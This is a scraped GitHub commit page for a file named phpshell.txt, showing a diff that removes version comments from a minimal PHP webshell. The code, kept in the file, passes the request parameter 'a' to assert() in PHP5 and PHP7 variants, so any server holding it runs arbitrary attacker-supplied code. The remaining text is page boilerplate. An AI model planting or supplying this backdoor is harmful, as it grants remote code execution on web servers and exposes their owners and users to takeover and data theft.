We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent e4ecfc3 commit a179be7Copy full SHA for a179be7
2 files changed
.nojekyll
phpshell.txt
@@ -1,9 +1,9 @@
1
-//php5
+
2
<?php
3
$a='assert';
4
[""=>$a($_REQUEST['a'])];
5
?>
6
-//php7
7
8
'assert'($_REQUEST['a']));
9
0 commit comments